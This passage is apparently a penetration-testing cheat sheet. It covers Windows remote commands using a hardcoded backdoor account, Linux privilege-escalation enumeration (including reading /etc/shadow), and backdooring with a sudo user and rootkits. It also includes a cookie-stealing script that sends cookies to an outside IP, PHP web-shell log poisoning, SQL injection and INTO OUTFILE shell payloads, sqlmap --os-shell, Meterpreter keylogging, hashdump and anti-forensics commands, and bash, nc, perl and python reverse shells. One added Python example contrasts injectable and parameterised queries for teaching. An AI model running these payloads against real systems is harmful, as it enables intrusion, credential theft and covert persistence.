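The same logic applies to the process that did the write: reg.exe or powershell.exe touching this value from an interactive user session is the case to investigate, whereas a configuration-management agent writing 0 is expected.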
Remote Commands
winexe --user=backdoor%laKK195@19z //10.11.1.218 ipconfig
winexe --user=backdoor%laKK195@19z --system //10.11.1.218 cmd
OR
nmap -sU -sS --script smb-psexec.nse --script-args=smbuser=<username>,smbpass=<password>[,config=<config>] -p U:137,T:139 <host>
5. Linux Privilege Escalation
Information Gathering
cat /etc/issue
cat /etc/*-release
cat /proc/version
uname -a
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-
lsb_release -a
+ Check sudoers
+ Check password files
Check for misconfigurations, i.e. is shadow readable? Is passwd writeable?
cat /etc/passwd
cat /etc/shadow
ls -l /etc/passwd
ls -l /etc/shadow
+ Learn your environment
Search for misconfigured PATH variables. Do they prioritize searching for executable files from a non-secure (i.e. world-writeable) path?
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
cat ~/.bash_history
env
set
Check history files
You might find plaintext passwords in there
+ Check cronjobs
Search for jobs using programs that run with root privileges and are potentially write-accessible by low-privileged users:
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
+ Check processes running as root for vulnerabilities
ps aux | grep root
ps -ef | grep root
+ Search files for plaintext credentials
grep -ir user *
grep -ir pass *
+ Find writable configuration files
find /etc/ -writable -type f 2>/dev/null
+ Run privesc scripts
LinEnum - https://www.rebootuser.com/?p=1758
linuxprivchecker.py - http://www.securitysift.com/download/linuxprivchecker.py
unix-privesc-check - https://github.com/pentestmonkey/unix-privesc-check
Escaping jail shells
python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
/bin/sh -i
Resources
6. Linux Post Exploitation
Backdooring Linux
+ Adding a backdoor user (very visible to the sysadmin)
Adding users
/usr/sbin/adduser backdoor
passwd backdoor
echo "backdoor ALL=(ALL) ALL" >> /etc/sudoers
+ Plant a rootkit (might make the system unstable)
Userland rootkits
+ more stable
+ more likely to remain planted after system updates
- more visible
- less control
Kernel rootkits
+ less visible
+ complete control
- more unstable
- more likely to cause problems with system updates
https://github.com/n1nj4sec/pupy
https://github.com/r00tkillah/HORSEPILL
http://r00tkit.me/
Resources
7. Web Applications
General
Try reading the PHP source code of the web application:
http://<ip>/script.php/?-s
Do you see any LFI/RFI vulnerability posted by Nikto? Try
Check for input validation in forms:
1' or 1=1 limit 1;# AND 1' or 1=1--)
Stealing Cookies
<iframe src="http://10.11.0.5/report" height = "0" width = "0"></iframe>
<script>
new Image().src="http://10.11.0.5/bogus.php?output="+document.cookie;
</script>
File Inclusion Vulnerabilities
php.ini values:
register_globals
allow_url
allow_url_fopen
allow_url_include
Terminate our request with a null byte (possible in PHP below 5.3)
For LFI/RFI attacks, this might be useful:
Contaminating Log Files
Contaminate the log file so that it contains PHP code, to be used later in an LFI attack:
nc -nv 192.168.30.35 80
<?php echo shell_exec($_GET['cmd']);?>
Thus cmd= is introduced into the PHP execution, and by including the log file you can now execute any command.
SQL Injection
Classic Authentication Bypass
select * from users where name ='any' or 1=1;#'
select * from users where name ='any' or 1=1 limit 1;#'
Error Based Enum
order by
union all operator → allows us to add our own select queries to the original, but the new select needs to have the same number of columns as the original select statement
union all select 1,2,3,4,5,6
union all select 1,2,3,4,@@version,6
union all select 1,2,3,4,user(),6
union all select 1,2,3,4,table_name,6 FROM information_schema.tables
union all select 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='users'
union select 1,2,name,4,password,6 FROM users
OR
http://10.11.1.35/comment.php?id=738 union select 1,2,3,4,concat(name,0x3a,password),6 FROM users
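Added example, not code from the original notes, serving both the Classic Authentication Bypass and the union column-count points above: a Python script with an in-memory SQLite table that runs the page's `' or 1=1--` payload through a string-concatenated query and through the parameterised query that fixes it, then shows why `union select 1,2,3` probing works, with the database rejecting a UNION whose column count differs. SQLite is used instead of MySQL so the script runs offline, which is why the `--` comment form is used rather than `;#` (SQLite does not treat `#` as a comment); the users table and its rows are constructed.

```python
import sqlite3
from typing import Optional, Tuple


def make_db() -> sqlite3.Connection:
    """In-memory users table with constructed rows (plaintext passwords only
    to keep the demo short; real systems store salted hashes)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (name, password) VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn


def login_vulnerable(conn: sqlite3.Connection, name: str, password: str) -> Optional[str]:
    """String concatenation: user input becomes part of the SQL text, so a quote
    closes the literal and ' or 1=1-- rewrites the WHERE clause."""
    query = f"SELECT name FROM users WHERE name = '{name}' AND password = '{password}'"
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection, name: str, password: str) -> Optional[str]:
    """Bound parameters: values travel separately from the SQL text and are
    compared as plain strings, so the same payload matches nobody."""
    row = conn.execute(
        "SELECT name FROM users WHERE name = ? AND password = ?", (name, password)
    ).fetchone()
    return row[0] if row else None


def union_probe(conn: sqlite3.Connection, injected: str) -> Tuple[str, object]:
    """Run a UNION payload through the concatenating query and report whether the
    database accepted it ('rows') or rejected it ('error', e.g. a column-count
    mismatch), which is what the order by / union select 1,2,3 probing exploits."""
    query = f"SELECT id, name, password FROM users WHERE name = '{injected}'"
    try:
        return ("rows", conn.execute(query).fetchall())
    except sqlite3.Error as exc:
        return ("error", str(exc))


BYPASS = "any' or 1=1--"  # the classic payload above, in its -- comment form

if __name__ == "__main__":
    db = make_db()
    print("vulnerable login:", login_vulnerable(db, BYPASS, "x"))      # alice
    print("parameterised login:", login_safe(db, BYPASS, "x"))         # None
    print(union_probe(db, "x' UNION ALL SELECT 1,2--"))                 # error: column counts differ
    print(union_probe(db, "x' UNION ALL SELECT 1,sqlite_version(),3--"))  # rows, version in column 2
```

The second union_probe call is the SQLite analogue of `union all select 1,2,3,4,@@version,6`: once the column count matches, any column can carry an expression of the attacker's choosing, which is exactly what parameter binding prevents.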
Blind SQL Injection
If the true and false versions of a condition give different results, that indicates a possible injection spot.
Use time as a test parameter for the query:
sleep(5)
select IF(MID(@@version,1,1) = '5', SLEEP(5), 0);
union all select 1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6
http://10.11.1.35/comment.php?id=738 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'
SQLMap
sqlmap -u http://192.168.30.35 --crawl=1
sqlmap -u http://192.168.30.35/comment.php?id=738 --dbms=mysql --dump --threads=5
sqlmap -u http://192.168.30.35/comment.php?id=738 --dbms=mysql --os-shell
Install the "Modify Headers" addon.
In some cases, to look like you have a different IP, you can change the value of the X-Forwarded-For header.
8. Meterpreter
Basic Commands
sysinfo
getpid
getuid
ps
ps -S notepad.exe
kill <pid>
ipconfig
route
migrate <PID>
getsystem
getprivs
use priv
hashdump
shell
background
File System Commands
ls
pwd
cd
del <file>
cat <file>
edit <file>
upload <src_file> <dst_file>
download <src_file> <dst_file>
getwd
getlwd
Port Forwarding
We have compromised victim1 with a meterpreter session (session_id). Background meterpreter and add the route below; it will redirect all traffic for victim2's subnet through victim1.
route add <victim2_subnet> <netmask> <session_id>
route -h
route list
route delete <victim2_subnet> <netmask> <session_id>
portfwd forwards traffic from port -l on Kali (localhost) to port -p of Target2 through the compromised Target1:
portfwd
portfwd add -l 1111 -p 2222 -r Target2
portfwd remove -l 1111 -p 2222 -r Target2
Execute Processes
Execute cmd.exe and interact with it
Execute cmd.exe with all available tokens
Execute cmd.exe with all available tokens and make it a hidden process
execute -f cmd.exe -i -H -t
1. -H Create the process hidden from view
2. -a Arguments to pass to the command
3. -i Interact with the process after creating it
4. -m Execute from memory
5. -t Execute process with currently impersonated thread token
Run Meterpreter-based scripts; for a full list check the scripts/meterpreter directory
Registry
Interact, create, delete, query, set, and much more in the target's registry
commands:
enumkey ->Enumerate the supplied registry key
createkey / deletekey -> Creates/deletes the supplied registry key
setval / queryval -> Set/query values from the supplied registry key
Options:
-d -> Data to store in the registry value
-k -> The registry key
-v -> The registry value name
Tokens
use incognito
list_tokens -u
list_tokens -g
impersonate_token DOMAIN_NAME\\USERNAME
steal_token PID
drop_token
rev2self
Sniffing
use sniffer
sniffer_interfaces
sniffer_dump interfaceID pcapname
sniffer_start interfaceID packet-buffer
sniffer_stats interfaceID
sniffer_stop interfaceID
Post Exploitation
add_user username password -h ip
add_group_user “Domain Admins” username -h ip
clearav
timestomp
screenshot
keyscan_start
keyscan_dump
keyscan_stop
uictl enable keyboard/mouse
setdesktop number
reboot
run post/windows/manage/enable_rdp
Run msfmap
Download it from http://code.google.com/p/msfmap
load msfmap
msfmap
References
9. SHELLS
bash -i >& /dev/tcp/10.11.0.102/8080 0>&1
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
perl -e 'use Socket;$i="10.11.0.102";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.0.102",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Always check for nc, nc.traditional, netcat or ncat with the full path if plain nc doesn't work!
RESOURCES
CREDIT -> https://www.sock-raw.org/wiki/doku.php/start